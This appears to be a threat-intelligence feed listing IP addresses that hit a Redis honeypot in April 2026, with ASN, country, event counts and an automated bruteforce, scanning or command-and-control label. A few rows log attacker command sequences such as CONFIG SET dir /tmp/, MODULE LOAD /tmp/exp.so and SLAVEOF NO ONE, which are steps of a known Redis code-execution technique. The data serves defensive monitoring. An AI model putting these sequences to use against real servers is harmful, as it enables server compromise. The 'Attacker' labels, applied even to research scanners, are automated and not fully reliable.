| IPv4 | 91.230.168.172 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 91.230.168.173 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 172.236.35.120 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; cats=Misc activity; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 20.163.14.227 | Attacker IP • Redis / seen in Redishoneypot; events=24; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 205.210.31.50 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 5.78.92.248 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=212317; asn_org=Hetzner Online GmbH; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 107.174.64.157 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=36352; asn_org=HostPapa; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 176.65.148.150 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); redis_cmd_hits=0 | scanning_host | 2026-04-25 | |
| IPv4 | 159.223.109.128 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 68.183.109.254 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 117.50.47.100 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0 | scanning_host | 2026-04-25 | |
| IPv4 | 130.131.162.156 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 66.132.172.36 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 66.132.186.219 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-25 | |
| IPv4 | 107.174.52.83 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=36352; asn_org=HostPapa; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 185.213.175.72 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=ES; asn=41608; asn_org=NextGenWebs, S.L.; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 184.105.139.70 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 184.105.139.82 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-25 | |
| IPv4 | 20.168.7.169 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-25 | |
| IPv4 | 100.28.191.174 | Attacker IP • Redis / seen in Redishoneypot; events=3; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-25 | |
| IPv4 | 154.36.175.126 | Attacker IP • Redis / seen in Redishoneypot; events=40; ports=6379; cc=HK; asn=979; asn_org=NetLab Global; redis_cmds=CONFIG SET dir /tmp/,config set dir .,MODULE LOAD /tmp/exp.so,MODULE UNLOAD system,SLAVEOF NO ONE; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-25 | |
| IPv4 | 205.210.31.174 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-26 | |
| IPv4 | 47.109.91.234 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-26 | |
| IPv4 | 52.165.223.243 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-26 | |
| IPv4 | 100.29.192.67 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-26 | |
| IPv4 | 172.206.225.242 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-26 | |
| IPv4 | 213.170.86.253 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=RU; asn=12418; asn_org=Quantum CJSC; redis_cmd_hits=0 | bruteforce | 2026-04-26 | |
| IPv4 | 184.105.139.115 | Attacker IP • Redis / seen in Redishoneypot; events=3; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-26 | |
| IPv4 | 107.174.52.105 | Attacker IP • Redis / seen in Redishoneypot; events=7; ports=6379; cc=US; asn=36352; asn_org=HostPapa; redis_cmd_hits=0 | bruteforce | 2026-04-26 | |
| IPv4 | 147.182.130.22 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-04-26 | |
| IPv4 | 121.29.89.93 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-04-26 | |
| IPv4 | 203.55.131.3 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=32475; asn_org=Internap Holding LLC; redis_cmd_hits=0 | bruteforce | 2026-04-26 | |
| IPv4 | 109.105.210.67 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=PT; asn=21859; asn_org=Zenlayer Inc; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 109.105.210.68 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=PT; asn=21859; asn_org=Zenlayer Inc; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 185.156.73.181 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 44.220.185.227 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 66.132.195.149 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 199.45.154.189 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 199.45.155.91 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 85.217.149.68 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=209334; asn_org=Modat B.V.; redis_cmds='GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 184.105.139.74 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 141.98.10.201 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=LT; asn=209605; asn_org=UAB Host Baltic; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 147.185.132.112 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 37.60.241.154 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; cats=Misc activity,Generic Protocol Command Decode; redis_cmd_hits=0; cmd="SSH-2.0-OpenSSH " | bruteforce | 2026-04-27 | |
| IPv4 | 135.237.125.206 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 185.156.73.86 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 134.199.145.53 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 170.64.196.209 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 34.38.4.44 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 47.84.20.0 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 172.236.96.130 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 34.62.98.30 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 35.195.219.31 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 88.210.63.69 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 160.119.76.63 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 20.65.195.124 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 206.189.180.60 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 221.226.215.154 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 223.72.120.26 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=56048; asn_org=China Mobile Communicaitons Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-27 | |
| IPv4 | 52.154.153.185 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-27 | |
| IPv4 | 198.235.24.47 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-28 | |
| IPv4 | 40.119.26.30 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-28 | |
| IPv4 | 193.163.125.4 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-28 | |
| IPv4 | 66.132.195.102 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-28 | |
| IPv4 | 137.184.74.1 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-28 | |
| IPv4 | 174.138.46.29 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-28 | |
| IPv4 | 65.49.20.87 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-28 | |
| IPv4 | 89.248.167.131 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=NL; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | bruteforce | 2026-04-28 | |
| IPv4 | 117.72.44.129 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=CN; asn=141679; asn_org=China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch; redis_cmds=CONFIG GET requirepass,GET __hpchk__,SET __hpchk__ hp90716,CONFIG GET dir; redis_cmd_hits=0; cmd="CONFIG GET dir" | bruteforce | 2026-04-28 | |
| IPv4 | 160.119.76.49 | Attacker IP • Redis / seen in Redishoneypot; events=35; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0 | bruteforce | 2026-04-28 | |
| IPv4 | 100.51.6.16 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-28 | |
| IPv4 | 143.244.128.100 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 20.168.6.22 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 216.25.89.125 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 66.132.186.188 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 34.78.147.222 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 35.187.99.78 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 35.233.67.81 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 146.56.220.191 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 71.6.232.29 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 104.248.227.249 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 115.190.12.139 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 159.65.225.208 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 167.99.15.135 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 85.11.183.25 | Attacker IP • Redis / seen in Redishoneypot; events=27; ports=6379; cc=GB; asn=201002; asn_org=PebbleHost Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 34.53.157.75 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 39.108.228.106 | Attacker IP • Redis / seen in Redishoneypot; events=40; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; cats=Generic Protocol Command Decode; redis_cmds=MODULE UNLOAD system,config set dir .,CONFIG SET dir /tmp/,config set rdbcompression no,save; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-29 | |
| IPv4 | 147.182.213.84 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 45.33.105.182 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 64.62.156.108 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 64.62.156.111 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 34.140.131.154 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-04-29 | |
| IPv4 | 34.14.112.157 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 34.76.82.19 | Attacker IP • Redis / seen in Redishoneypot; events=31; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmds=CONFIG GET bind; redis_cmd_hits=0; cmd="CLUSTER NODES" | bruteforce | 2026-04-29 | |
| IPv4 | 160.119.76.51 | Attacker IP • Redis / seen in Redishoneypot; events=34; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 198.235.24.243 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 85.11.183.21 | Attacker IP • Redis / seen in Redishoneypot; events=28; ports=6379; cc=GB; asn=201002; asn_org=PebbleHost Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-29 | |
| IPv4 | 184.105.247.235 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-30 | |
| IPv4 | 18.217.208.51 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-30 | |
| IPv4 | 20.14.89.155 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-30 | |
| IPv4 | 14.153.174.92 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-30 | |
| IPv4 | 66.132.172.186 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-30 | |
| IPv4 | 94.26.106.155 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=DE; asn=215607; asn_org=dataforest GmbH; redis_cmd_hits=0 | bruteforce | 2026-04-30 | |
| IPv4 | 157.230.179.248 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-30 | |
| IPv4 | 223.72.120.103 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=56048; asn_org=China Mobile Communicaitons Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-30 | |
| IPv4 | 66.132.186.186 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-30 | |
| IPv4 | 66.132.186.246 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-30 | |
| IPv4 | 106.75.191.108 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0 | scanning_host | 2026-04-30 | |
| IPv4 | 163.245.218.247 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=19318; asn_org=Interserver, Inc; redis_cmd_hits=0 | scanning_host | 2026-04-30 | |
| IPv4 | 20.168.5.42 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-30 |
0
Total STIX indicator objects.
Signal strength
0
Redis attackers probing for misconfigs and open auth.